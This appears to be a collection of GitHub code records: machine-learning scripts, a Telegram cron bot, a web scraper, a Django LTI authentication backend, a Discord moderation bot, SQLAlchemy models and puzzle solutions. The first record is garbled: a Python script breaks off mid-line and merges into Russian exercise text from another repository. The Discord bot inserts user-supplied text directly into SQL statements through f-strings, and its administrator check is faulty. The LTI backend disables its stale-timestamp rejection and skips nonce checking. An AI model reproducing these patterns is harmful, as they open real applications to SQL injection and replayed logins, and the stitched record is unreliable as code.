+{"seq_id":"33941893860","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing\n\n# Attribute selection\nfrom sklearn.feature_selection import SelectFromModel # Regularization (L1 norm)\nfrom sklearn.linear_model import LogisticRegression\n\n# sklearn, various:\nfrom sklearn.model_selection import train_test_split\n\n#Classifiers:\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import classification_report\n\n\n# Load from a CSV\ndataproy = pd.read_csv(r\"C:\\Users\\julen\\Desktop\\UNIVERSIDAD\\4A\\SCCBD (Smart Cities Ciberseguridad y Big Data)\\Bigdata\\EntregableS5_Julen\\Household energy bill data.csv\") \n\n# Attribute information // gives me the type of each column\nprint(dataproy.info())\n\n#---------------------------------------------------------------------------------------------------------------\n\n###NOISE\nmu, sigma = 0, 0.1 \n# creating noise \nnoise = np.random.normal(mu, sigma, [1000,1]) \nprint(noise)\ndataproy['noise'] = noise\n\n#---------------------------------------------------------------------------------------------------------------\n\n###RANGES\n# Binning numerical columns // split into 10 groups depending on the amount paid\n# // we create a new column with these groups\n# Using Pandas // distributes into 10 groups of the same size\ndataproy['Cat_amount_paid'] = pd.qcut(dataproy['amount_paid'], q=10, labels=False )\n\n####ATTRIBUTE SELECTION\n\n# Remove the amount_paid columns\ndataproy2 = dataproy.drop(['amount_paid', 'Cat_amount_paid'],axis=1)\nprint(dataproy2.info())\n\n\n# # Brute force with correlation // not used because it gives very small correlations and is not useful\n# # Unsupervised Features correlation \n# X = dataproy2\n# correlated_features = set()\n# _correlation_matrix = X.corr(method='spearman')\n# for i in range(len(_correlation_matrix.columns)):\n#     for j in range(i):\n#         if abs(_correlation_matrix.iloc[i, j]) > 0.1:\n#             _colname = _correlation_matrix.columns[i]\n#             correlated_features.add(_colname)\n\n# print(\"Unsupervised brute force\")\n# print(\"Strong correlated features\")\n# print(_correlation_matrix)\n# print(correlated_features)\n\n# Split in train and test datasets\n# 2D Attributes\nX = dataproy2\ny = dataproy['Cat_amount_paid'] \nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=6)\n\n# Regularization (L1 norm)\n# Using sklearn.feature_selection.SelectFromModel\n\n\nlogistic = LogisticRegression(penalty='l1', solver='saga', multi_class='multinomial', max_iter=10000)\nsfm = SelectFromModel(estimator=logistic)\nsfm.fit(X, y)\nfeature_importances = pd.DataFrame({'feature':X.columns,'importance':sfm.get_support()})\n\nprint(\"Regularization (L1 norm) Embedded approach\")\nprint(feature_importances)\n\n\n\n#----------------------------------------------------------------------------------------------------------\n##### CHOICE OF CLASSIFIER WITH THE BEST VALUES\n# DecisionTreeClassifier\nprint('DecisionTreeClassifier OPTIMIZADO...')\ntree_model2 = DecisionTreeClassifier(criterion='gini', max_depth=10, splitter='random', random_state=1)\ntree_model2.fit(X_train, y_train)\n\n\n# test prediction\ny_pred = tree_model2.predict(X_test)\nprint('Accuracy con optimizado: %.2f%%' % (100.0 * tree_model2.score(X_test, 
y_test)))\nprint('Sin nada optimizado: ', classification_report(y_test, y_pred)[-162:]) # classification report // gives me the percentages
Посчитайте 4 числа: суммарную калорийность и граммы белков, жиров и углеводов.\n# Числа округлите до целых вниз и введите через пробел.\n# Информация о каждом дне должна выводиться в отдельной строке.","repo_name":"ddr533/Python_for_practice-stepic_course","sub_path":"Part2__pandas__zip/2.3.2.py","file_name":"2.3.2.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25278200097","text":"import json\nimport logging\nimport random\nfrom datetime import datetime, timedelta\nfrom random import randrange\n\nimport environ\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom clients.chat import send_telegram_message\nfrom clients.cron import set_crons\nfrom clients.logs import ManagementCommandsHandler\nfrom crons.models import Cron\n\n\ndef get_tomorrow_run() -> datetime:\n tomorrow = datetime.today() + timedelta(days=1)\n start = tomorrow.replace(hour=9, minute=30, second=0, microsecond=0)\n end = start + timedelta(hours=13)\n return start + timedelta(seconds=randrange((end - start).seconds))\n\n\nclass Command(BaseCommand):\n def handle(self, *_, **__):\n logger = logging.getLogger(__name__)\n logger.addHandler(ManagementCommandsHandler())\n\n config = environ.Env()\n logger.info(\"It's time to take a picture...\")\n data_path = settings.BASE_DIR / \"bots\" / \"management\" / \"commands\" / \"data\"\n\n with open(data_path / \"saluturi.json\", \"r\") as salut_file:\n salut = random.choice(json.load(salut_file))\n with open(data_path / \"actions.json\", \"r\") as actions_file:\n action = random.choice(json.load(actions_file))\n\n text = f\"❗️📷 {salut} {action} 📷❗️\"\n send_telegram_message(\n chat_id=config(\"BE_REAL_CHAT_ID\"),\n text=text,\n disable_notification=False,\n )\n\n tomorrow_run = get_tomorrow_run().replace(second=0, microsecond=0)\n expression = f\"{tomorrow_run.minute} {tomorrow_run.hour} {tomorrow_run.day} {tomorrow_run.month} *\"\n Cron.objects.filter(command__contains=\"be_real\").update(expression=expression)\n set_crons(\n [\n Cron(\n command=\"be_real\",\n expression=expression,\n is_active=True,\n is_management=True,\n )\n ]\n )\n logger.info(\n f\"Set next run and cron to {tomorrow_run.strftime('%H:%M %d.%m.%Y')}\"\n )\n\n return self.stdout.write(self.style.SUCCESS(\"Done.\"))\n","repo_name":"andreipradan/mainframe","sub_path":"backend/bots/management/commands/be_real.py","file_name":"be_real.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74832674066","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\n\nurl = \"https://www.coupang.com/np/search?component=&q=%EB%85%B8%ED%8A%B8%EB%B6%81&channel=user\"\nheaders = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Whale/2.11.126.19 Safari/537.36\"}\nres = requests.get(url)\nres.raise_for_status()\nsoup = BeautifulSoup(res.text, \"lxml\")\n\nitems = soup.find_all(\"li\", attrs={\"class\":re.compile(\"^search-product\")})\nprint(items[0].find(\"div\", attrs={\"class\":\"name\"}).get_text())\n","repo_name":"Jarry-Ha/TIL_github","sub_path":"1_python/1.study/2_RPA/nadocoding/9_bs4_coupang.py","file_name":"9_bs4_coupang.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} 
+{"seq_id":"73694560784","text":"\"\"\"Backend class to authenticate LTI requests.\"\"\"\nfrom time import time\nfrom typing import Mapping, Optional\n\nimport oauth2\nfrom django import http\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.backends import ModelBackend\nfrom django.contrib.auth.models import Group\nfrom django.core.exceptions import PermissionDenied\n\nfrom ontask import LOGGER\nfrom ontask.lti.tool_provider import DjangoToolProvider\n\n\nclass LTIAuthBackend(ModelBackend):\n \"\"\"Class to authenticate an LTI request.\n\n By default, the ``authenticate`` method creates ``User`` objects for\n usernames that don't already exist in the database. Subclasses can disable\n this behavior by setting the ``create_unknown_user`` attribute to\n ``False``.\n \"\"\"\n # Create a User object if not already in the database?\n create_unknown_user = True\n # Username prefix for users without a sis source id\n unknown_user_prefix = 'cuid:'\n\n def authenticate(\n self,\n request: http.HttpRequest,\n username: Optional[str] = None,\n password: Optional[str] = None,\n **kwargs: Mapping,\n ):\n \"\"\"Try to authenticate an LTI request.\"\"\"\n if settings.DEBUG:\n LOGGER.info('Begin authentication process')\n\n if not request:\n if settings.DEBUG:\n LOGGER.info('No request object in authentication')\n return None\n\n request_key = request.POST.get('oauth_consumer_key')\n\n if request_key is None:\n LOGGER.debug(\n 'Request does not contain an oauth_consumer_key. Stopping')\n return None\n\n if not settings.LTI_OAUTH_CREDENTIALS:\n LOGGER.debug('Missing LTI_OAUTH_CREDENTIALS in settings')\n raise PermissionDenied\n\n secret = settings.LTI_OAUTH_CREDENTIALS.get(request_key)\n\n if secret is None:\n LOGGER.debug('Could not get a secret for key %s', request_key)\n raise PermissionDenied\n\n LOGGER.debug('using key/secret %s', request_key)\n tool_provider = DjangoToolProvider(\n request_key,\n secret,\n request.POST.dict())\n\n postparams = request.POST.dict()\n\n LOGGER.debug('Request is secure: %s', request.is_secure())\n if settings.DEBUG:\n for key in postparams:\n LOGGER.debug('POST %s: %s', key, postparams.get(key))\n LOGGER.debug('Request abs url is %s', request.build_absolute_uri())\n\n for key in request.META:\n LOGGER.debug('META %s: %s', key, request.META.get(key))\n\n LOGGER.info('Checking the signature')\n\n try:\n request_is_valid = tool_provider.is_valid_request(request)\n except oauth2.Error:\n LOGGER.exception(\n 'error attempting to validate LTI launch %s',\n postparams)\n request_is_valid = False\n\n if not request_is_valid:\n LOGGER.error('Invalid request: signature check failed.')\n raise PermissionDenied\n\n LOGGER.info('done checking the signature')\n LOGGER.info(\n 'about to check the timestamp: {%s}',\n int(tool_provider.oauth_timestamp))\n\n if time() - int(tool_provider.oauth_timestamp) > 60 * 60:\n LOGGER.error('OAuth timestamp is too old.')\n # raise PermissionDenied\n else:\n LOGGER.info('Valid timestamp')\n\n LOGGER.info('Done checking the timestamp')\n\n # (this is where we should check the nonce)\n\n # if we got this far, the user is good\n\n user = None\n\n # Retrieve username from LTI parameter or default to an overridable\n # function return value\n username = (\n tool_provider.lis_person_sourcedid or\n self.get_default_username(\n tool_provider,\n prefix=self.unknown_user_prefix))\n\n email = tool_provider.lis_person_contact_email_primary\n first_name = tool_provider.lis_person_name_given\n last_name = 
tool_provider.lis_person_name_family\n roles = tool_provider.roles\n\n # Check that we have an email field at least\n if not email:\n LOGGER.error('Invalid request: Invalid email.')\n raise PermissionDenied\n\n LOGGER.info('Valid username: %s', username)\n\n user_model = get_user_model()\n\n # Note that this could be accomplished in one try-except clause, but\n # instead we use get_or_create when creating unknown users since it has\n # built-in safeguards for multiple threads.\n if self.create_unknown_user:\n user, created = user_model.objects.get_or_create(email=email)\n\n if created:\n LOGGER.debug(\n 'Authenticate created a new user for %s',\n username)\n else:\n LOGGER.debug(\n 'Authenticate found an existing user for %s',\n username)\n\n else:\n LOGGER.debug(\n 'automatic user creation disbled. Find and existing record')\n try:\n user = user_model.objects.get_by_natural_key(username)\n except user_model.DoesNotExist:\n LOGGER.debug('authenticate could not find user %s', username)\n\n # update user information if given by LTI and not present in user obj.\n if not user.name and username:\n user.name = username\n if not user.name and first_name and last_name:\n user.name = first_name + ' ' + last_name\n\n # check if substring group_role in the user's launch roles\n should_be_in_instructor_group = any(\n group_role_substring in roles\n for group_role_substring in settings.LTI_INSTRUCTOR_GROUP_ROLES\n )\n if (\n should_be_in_instructor_group\n and not user.groups.filter(name='instructor').exists()\n ):\n user.groups.add(Group.objects.get(name='instructor'))\n\n user.save()\n LOGGER.debug('Updated the user record in the database')\n\n return user\n\n @staticmethod\n def get_default_username(tool_provider, prefix=''):\n \"\"\"Return a default username value from tool_provider.\n\n This is needed in case offical LTI param lis_person_sourcedid is not\n present.\n \"\"\"\n # Default back to user_id lti param\n uname = tool_provider.get_custom_param(\n 'canvas_user_id') or tool_provider.user_id\n return prefix + uname\n","repo_name":"abelardopardo/ontask_b","sub_path":"ontask/django_auth_lti/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"48"} +{"seq_id":"5372028081","text":"# -*-encode=utf-8-*-\n\nimport numpy as np\nfrom scipy.misc import imread\n\n\ntheta = np.load('./theta68.txt')\nimage = imread('./nine.png')\nimage = image.reshape(image.shape[0] * image.shape[1], 1)\na = np.exp(theta * image)\nb = np.sum(np.exp(theta * image), axis=0)\nr = a / b\nmax = r[0]\nindex = 0\nsum = 0\nfor i, e in enumerate(r):\n sum += e\n if e > max:\n max = e\n index = i\nprint(sum)\nprint('---')\nprint(r)\nprint('digit is:%d' % index)","repo_name":"FrankLeeC/MachineLearning","sub_path":"softmax/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"852252347","text":"class test:\r\n def __init__(self):\r\n self.a = 10\r\n self.b = 20\r\n def inva(self):\r\n print('insid access variable:',self.a)\r\nt = test()\r\nt.inva()\r\nprint('out side access variable:',t.b) \r\n\r\n\r\nclass test:\r\n def __init__(self):\r\n self.a = 10\r\n self.b = 20\r\n self.c = 30\r\n def inva(self):\r\n del self.a\r\nt = test()\r\nprint(t.__dict__) \r\n\r\nt1 = test()\r\nt1.inva()\r\ndel t1.c\r\nprint('t1 object print:',t1.__dict__)\r\n\r\nt2 = test()\r\ndel 
t2.a,t2.b\r\nprint('t2 object will print:',t2.__dict__)","repo_name":"harishramuk/python-handson-exercises","sub_path":"268. clss.py","file_name":"268. clss.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20601810097","text":"from discord.ext import commands\nfrom modules.functions import *\nfrom modules.config import config\n\nimport discord\nimport pymysql\n\n\nmysql_host = config[\"MysqlHost\"]\nmysql_user = config[\"MysqlId\"]\nmysql_password = config[\"MysqlPw\"]\nmysql_db = config[\"MysqlDb\"]\nEcheck = '\\N{WHITE HEAVY CHECK MARK}'\n\nclass ServerModerator(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='customTitle')\n async def _setTitle(self, ctx: commands.Context, *, settings):\n \"\"\"\n Set Custom Title.\n \"\"\"\n if not ctx.message.author.guild_permissions.administrator or ctx.author.id != ctx.guild.owner_id:\n return await ctx.message.add_reaction('❌')\n else:\n await ctx.message.add_reaction('✔️')\n\n try:\n conn = pymysql.connect(host=mysql_host, user=mysql_user, password=mysql_password, db=mysql_db, charset='utf8mb4')\n except Exception as e:\n printt(f\"{Fore.RED}DB Server Connect Failed\")\n exit()\n cur = conn.cursor()\n\n #get Notice Channel\n cur.execute(f'SELECT noticeChannel From servers WHERE guild_id={ctx.guild.id}')\n channel = cur.fetchone()\n channel = channel[0]\n c = self.bot.get_channel(channel)\n async with ctx.typing():\n if settings in ';':\n return await ctx.send('Custom title should not contain `;`.', delete_after=10)\n cur.execute(f'UPDATE servers SET customTitle=\"{settings}\" WHERE guild_id={ctx.guild.id}')\n printt(f\"{Fore.LIGHTGREEN_EX}{ctx.guild} {Fore.RESET}| {Fore.LIGHTYELLOW_EX}changed customTitle.\")\n conn.commit()\n cur.close()\n embed = discord.Embed(title=\"Changed Settings\", color=0xED4245)\n embed.add_field(name=\"custom Title has been changed successfully.\",value=f\"New customTitle: {settings}\",inline=False)\n embed.set_footer(text=\"Guardian | Discord Server Guardian\")\n await c.send(embed = embed)\n return await ctx.send('The custom title has been changed successfully.', delete_after=10)\n\n @commands.command(name='customText')\n async def _setText(self, ctx: commands.Context, *, settings):\n \"\"\"\n Set Custom Text.\n \"\"\"\n if not ctx.message.author.guild_permissions.administrator or ctx.author.id != ctx.guild.owner_id:\n return await ctx.message.add_reaction('❌')\n else:\n await ctx.message.add_reaction('✔️')\n\n try:\n conn = pymysql.connect(host=mysql_host, user=mysql_user, password=mysql_password, db=mysql_db, charset='utf8mb4')\n except Exception as e:\n printt(f\"{Fore.RED}DB Server Connect Failed\")\n exit()\n cur = conn.cursor()\n\n #get Notice Channel\n cur.execute(f'SELECT noticeChannel From servers WHERE guild_id={ctx.guild.id}')\n channel = cur.fetchone()\n channel = channel[0]\n c = self.bot.get_channel(channel)\n async with ctx.typing():\n if settings in ';':\n return await ctx.send('Custom text should not contain `;`.', delete_after=10)\n cur.execute(f'UPDATE servers SET customText=\"{settings}\" WHERE guild_id={ctx.guild.id}')\n printt(f\"{Fore.LIGHTGREEN_EX}{ctx.guild} {Fore.RESET}| {Fore.LIGHTYELLOW_EX}changed customText.\")\n conn.commit()\n cur.close()\n embed = discord.Embed(title=\"Changed Settings\", color=0xED4245)\n embed.add_field(name=\"custom Text has been changed successfully.\",value=f\"New customText: {settings}\",inline=False)\n 
embed.set_footer(text=\"Guardian | Discord Server Guardian\")\n await c.send(embed = embed)\n return await ctx.send('The custom text has been changed successfully.', delete_after=10)\n\n @commands.command(name='role')\n async def _setRole(self, ctx: commands.Context, *, settings):\n \"\"\"\n Set the roles to be give to users who successfully authenticate.\n \"\"\"\n if not ctx.message.author.guild_permissions.administrator or ctx.author.id != ctx.guild.owner_id:\n return await ctx.message.add_reaction('❌')\n else:\n await ctx.message.add_reaction('✔️')\n\n try:\n conn = pymysql.connect(host=mysql_host, user=mysql_user, password=mysql_password, db=mysql_db, charset='utf8mb4')\n except Exception as e:\n printt(f\"{Fore.RED}DB Server Connect Failed\")\n exit()\n cur = conn.cursor()\n\n #get Notice Channel\n cur.execute(f'SELECT noticeChannel From servers WHERE guild_id={ctx.guild.id}')\n channel = cur.fetchone()\n channel = channel[0]\n c = self.bot.get_channel(channel)\n async with ctx.typing():\n if settings in ';':\n return await ctx.send('Role should not contain `;`.', delete_after=10)\n cur.execute(f'UPDATE servers SET verify_role=\"{settings}\" WHERE guild_id={ctx.guild.id}')\n printt(f\"{Fore.LIGHTGREEN_EX}{ctx.guild} {Fore.RESET}| {Fore.LIGHTYELLOW_EX}changed Role.\")\n conn.commit()\n cur.close()\n embed = discord.Embed(title=\"Changed Settings\", color=0xED4245)\n embed.add_field(name=\"Role has been changed successfully.\",value=f\"New Role: {settings}\",inline=False)\n embed.set_footer(text=\"Guardian | Discord Server Guardian\")\n await c.send(embed = embed)\n return await ctx.send('Role has been changed successfully.', delete_after=10)\n\n\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild):\n try:\n conn = pymysql.connect(host=mysql_host, user=mysql_user, password=mysql_password, db=mysql_db, charset='utf8mb4')\n except Exception as e:\n printt(f\"{Fore.RED}DB Server Connect Failed\")\n exit()\n cur = conn.cursor()\n\n guildName = str(guild.name)\n guildId = str(guild.id)\n guildOwnerId = str(guild.owner_id)\n guildOwnerName = str(guild.owner)\n guildOwner = self.bot.get_user(guildOwnerId)\n NoticeChannelName = \"Guardian Notice\"\n\n printt(f\"{Fore.LIGHTBLUE_EX}{guildName}({guildId}){Fore.LIGHTYELLOW_EX} New Server Detect!\")\n \n #Todo: Get Category\n try:\n category = discord.utils.get(guild.categories, name=\"Guardian\")\n except: #if it has something wrong, Create a Auth Category\n printt(f'{Fore.RED}Guardian Category is not found at {guildName} so i will make a one.')\n category = await guild.create_category(\"Guardian\")\n if category == None:\n printt(f'{Fore.RED}Guardian Category is not found at {guildName} so i will make a one.')\n category = await guild.create_category(\"Guardian\")\n \n #Todo: Create a Channel And Set Permission\n try:\n channel = discord.utils.get(guild.channels, name=NoticeChannelName)\n except:\n channel = await guild.create_text_channel(NoticeChannelName, category=category)\n channel_overwrite = discord.PermissionOverwrite()\n channel_overwrite.read_messages = False\n channel_overwrite.read_message_history = False\n channel_overwrite.send_messages = False\n await channel.set_permissions(guild.default_role, overwrite=channel_overwrite)\n if channel == None:\n channel = await guild.create_text_channel(NoticeChannelName, category=category)\n channel_overwrite = discord.PermissionOverwrite()\n channel_overwrite.read_messages = False\n channel_overwrite.read_message_history = False\n channel_overwrite.send_messages = False\n await 
channel.set_permissions(guild.default_role, overwrite=channel_overwrite)\n\n # #Todo: Create a Role named \"Verified\"\n # await guild.create_role(name=\"verified\")\n # role = discord.utils.get(guild.roles, name=\"verified\")\n\n # #set All channels Role\n # guild_channels = []\n # for guild in self.bot.guilds:\n # for channel in guild.channels:\n # overwrite = discord.PermissionOverwrite()\n # overwrite.read_messages = True\n # overwrite.read_message_history = True\n # overwrite.send_messages = True\n # overwrite.manage_channels = True\n # await channel.set_permissions(guild.me, overwrite=overwrite)\n # #set @everyone permissions\n # channel_overwrite = discord.PermissionOverwrite()\n # channel_overwrite.read_messages = False\n # channel_overwrite.read_message_history = False\n # channel_overwrite.send_messages = False\n # await channel.set_permissions(guild.default_role, overwrite=channel_overwrite)\n # #set Role permissions\n # overwritee = discord.PermissionOverwrite()\n # overwritee.read_messages = True\n # overwritee.read_message_history = True\n # overwritee.send_messages = True\n # await channel.set_permissions(role, overwrite=overwritee)\n\n #commit the data\n cur.execute(f'INSERT INTO servers VALUES({guildId}, \"{category.id}\", \"\", \"\", {channel.id}, \"verified\") ON DUPLICATE KEY UPDATE guild_id={guildId}, category_id=\"{category.id}\", customText=\"\", noticeChannel={channel.id}, verify_role=\"verified\"')\n conn.commit()\n cur.close()\n\n #make a discord embed\n embed = discord.Embed(title=\"Thank you for using the Guardian!\", color=0x62c1cc)\n embed.add_field(name=\"Please don't delete and edit This channel!\",value=f\"User's captcha log, developer's announcement will be send on this channel! If you modify the name of this channel, the bot will not work smoothly, so please do not modify or delete this channel!\",inline=False)\n embed.add_field(name=\"Where is the commands list?\",value=f\"please enter the command **{config['BotPrefix']}help** .\",inline=False)\n embed.set_footer(text=\"Guardian | Discord Server Guardian\")\n msg = await channel.send(embed = embed)\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(ServerModerator(bot))","repo_name":"zeee2/Guardian","sub_path":"cogs/ServerModerator.py","file_name":"ServerModerator.py","file_ext":"py","file_size_in_byte":10560,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"71655831827","text":"import radio\r\nfrom microbit import *\r\n\r\n# The radio won't work unless it's switched on.\r\nradio.on()\r\nradio.config(channel=7)\r\n\r\n# keep score\r\nmessages_rec = 0\r\n\r\n# Event loop.\r\nwhile True:\r\n # Button A sends ping\r\n if button_a.was_pressed():\r\n radio.send('ping')\r\n # Button B prints total so far \r\n if button_b.was_pressed():\r\n display.scroll(messages_rec)\r\n # Read any incoming messages.\r\n incoming = radio.receive()\r\n if incoming == 'ping':\r\n display.show(Image.SQUARE_SMALL, delay=100, wait=False, clear=True)\r\n messages_rec += 1","repo_name":"Pratt-Institute/MicroPython4MicroBit","sub_path":"radio-ping-pong.py","file_name":"radio-ping-pong.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"4533571078","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, TIMESTAMP, DateTime, func\nfrom sqlalchemy.dialects.mysql import BIGINT\nfrom sqlalchemy.orm import relationship\nfrom 
sqlalchemy.schema import ForeignKey\nfrom datetime import datetime\n\nBase = declarative_base()\n\nclass PipelineRecord(Base):\n\n    __tablename__ = 'pipeline'\n\n    id = Column(Integer, primary_key=True)\n\n    pipeName = Column('pipe_name', String(100))\n    pipeID = Column('pipe_id', Integer())\n    status = Column(String(100))\n    timestamp = Column(TIMESTAMP, server_default=func.current_timestamp(), onupdate=func.current_timestamp())\n    pipeDir = Column('pipe_dir', String(200))\n    addendum = Column(String(200))\n\n    def __init__(self, pipe, status = None, addendum = None):\n\n        self.pipeName = pipe.name\n        self.pipeID = pipe.pipeID\n        self.status = status\n        self.pipeDir = pipe.pipeDir\n        if addendum:\n            self.addendum = addendum\n\n    def __repr__(self):\n        return \"<PipelineRecord(pipe_name='%s', pipe_id='%s')>\" % (self.pipeName, self.pipeID)\n\n\nclass ModuleRecord(Base):\n\n    __tablename__ = 'module'\n\n    id = Column(Integer, primary_key=True)\n\n    modName = Column('mod_name', String(50))\n    modID = Column('mod_id', Integer())\n\n    pipeName = Column('pipe_name', String(100))\n    pipeID = Column('pipe_id', Integer())\n\n    status = Column(String(100))\n\n    pid = Column('process_id', Integer())\n    jobID = Column('job_id', Integer())\n\n    runType = Column('run_type', String(50))\n    hostname = Column('host', String(50))\n    \n    timestamp = Column(TIMESTAMP, server_default=func.current_timestamp(), onupdate=func.current_timestamp())\n    modArgs = Column('mod_args', String(1000))\n    slurmArgs = Column('slurm_args', String(1000))\n    addendum = Column(String(200))\n\n    def __init__(self, mod, status = None, addendum = None):\n\n        self.modName = mod.name\n        self.modID = mod.modID\n\n        self.pipeName = mod.pipe.name\n        self.pipeID = mod.pipe.pipeID\n\n        self.status = status\n\n        if mod.runType:\n            self.runType = mod.runType\n\n        if mod.hostname:\n            self.hostname = mod.hostname\n\n        if mod.pid:\n            self.pid = mod.pid\n        \n        if mod.jobID:\n            self.jobID = mod.jobID\n\n        if mod.modConfig.argsJson:\n            self.modArgs = mod.modConfig.argsJson\n\n        if mod.slurmConfig.argsJson:\n            self.slurmArgs = mod.slurmConfig.argsJson\n\n        if addendum:\n            self.addendum = addendum\n\n    def __repr__(self):\n        return \"<ModuleRecord(mod_name='%s', mod_id='%s', pipe_name='%s', pipe_id='%s')>\" % (self.modName, self.modID, self.pipeName, self.pipeID)\n\n\nclass MaxID(Base):\n\n    __tablename__ = 'max_id'\n\n    id = Column(Integer, primary_key=True)\n\n    pipeID = Column('pipe_id', Integer()) # without the __init__ below, modID and pipeID would default to None\n    modID = Column('mod_id', Integer())\n\n\n    def __init__(self):\n\n        self.pipeID = 0 #set defaults\n        self.modID = 0\n\n\n    \ndef getBase():\n    return Base\n\n\n\n\n","repo_name":"harvardinformatics/IggyTools","sub_path":"IggyTools/iggytools/iggypipeline/sqlalchemy_models.py","file_name":"sqlalchemy_models.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3345118386","text":"from dataset import *\nfrom train import *\nfrom UNET import *\n\n\ndef main():\n\n    unet = UNET(4, 2)\n\n    base_path = Path(\"../input/38-Cloud_training\")\n    dataset = CloudDastaset(\n        base_path / \"train_red\",\n        base_path / \"train_green\",\n        base_path / \"train_blue\",\n        base_path / \"train_nir\",\n        base_path / \"train_gt\",\n    )\n    # print(\"dataset has a length of: \", len(dataset))\n    # print('torch: ',torch.__version__)\n    # print('torchcuda available: ',torch.cuda.is_available())\n    # print(torch.__file__)\n\n    # the two split sizes must sum exactly to len(dataset) for random_split\n    train_size = int(len(dataset) * 7 / 10)\n    train_val_size = (train_size, len(dataset) - train_size)\n    train_ds, valid_ds = torch.utils.data.random_split(dataset, train_val_size)\n    train_dl = DataLoader(train_ds, 
batch_size=10, shuffle=True)\n    valid_dl = DataLoader(valid_ds, batch_size=10, shuffle=True)\n\n    loss_fn = nn.CrossEntropyLoss()\n    opt = torch.optim.Adam(unet.parameters(), lr=0.01)\n\n    \n    train_loss, valid_loss = train(\n        unet, train_dl, valid_dl, loss_fn, opt, acc_metric, epochs=25\n    )\n    \n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"LeBrav/CloudSegmentation","sub_path":"workspace/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14883179446","text":"def fuel(numbers, target, costs):\n    f = 0\n    for n in numbers:\n        steps = abs(target - n)\n        f += costs[steps]\n    return f\n\n\ndef main():\n    with open(\"input.txt\") as f:\n        line = f.readline()\n    numbers = [int(nr) for nr in line.split(\",\")]\n    print(f\"{len(numbers)} numbers read\")\n\n    costs = {}\n    max_dist = abs(min(numbers) - max(numbers))\n    cost = 0\n    total_cost = 0\n    for t in range(0, max_dist + 1):\n        costs[t] = total_cost\n        cost += 1\n        total_cost += cost\n    print(costs)\n\n    min_fuel = costs[max_dist] * len(numbers)\n    for t in range(min(numbers), max(numbers) + 1):\n        f = fuel(numbers, t, costs)\n        min_fuel = min(min_fuel, f)\n        print(t, f)\n\n    result = min_fuel\n    print(f\"Result: {result}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"mkopec87/advent_of_code","sub_path":"src/2021/day07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"26088802009","text":"class Solution:\n    def longestCommonPrefix(self, strs: List[str]) -> str:\n        if len(strs) == 0:\n            return \"\"\n        prefix = strs[0]\n        for s in strs[1:]:\n            while (s.find(prefix) != 0):\n                prefix = prefix[:len(prefix)-1]\n                if prefix == \"\":\n                    return \"\"\n        return prefix","repo_name":"finderkiller/LeetCode","sub_path":"14LongestCommonPrefix.py","file_name":"14LongestCommonPrefix.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29448361900","text":"import numpy as np\n\nfrom culstm import LstmInput, LstmOutput, LstmNetwork, LstmConfig, LstmNode\nimport culstm\n\ndef example_0():\n    # parameters for input data dimension and lstm cell count \n    hiddenSize = 32\n    inputSize = 32\n    numLayers = 4\n    seqLength = 20\n    miniBatch = 64\n    lstm_input = LstmInput(inputSize, seqLength)\n    for e in range(miniBatch):\n        lstm_input.add([[0.2 for x in range(inputSize)] for x in range(seqLength)])\n    lstm_output = LstmOutput(hiddenSize, seqLength)\n    for e in range(miniBatch):\n        lstm_output.add([[1 for x in range(1)] for x in range(seqLength)])\n\n    lstm_config = LstmConfig(inputSize, hiddenSize, numLayers, seqLength, miniBatch, loss_func = culstm.square)\n    lstm_node = LstmNode(gates = culstm.vanilla, Peepholes=False)\n    lstm_net = LstmNetwork(lstm_config, lstm_node)\n    lstm_net.run(lstm_input, lstm_output)\n    lstm_net.clean()\n\nif __name__ == \"__main__\":\n    example_0()\n\n","repo_name":"yuangliu/15618prj","sub_path":"culstm/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"32537732691","text":"# -*- coding: utf-8 -*-\n\"\"\"\njson to yaml converter\n\"\"\"\n\nimport json\nimport yaml\n\nclass ConvertJsonToYaml:\n    @staticmethod\n    def 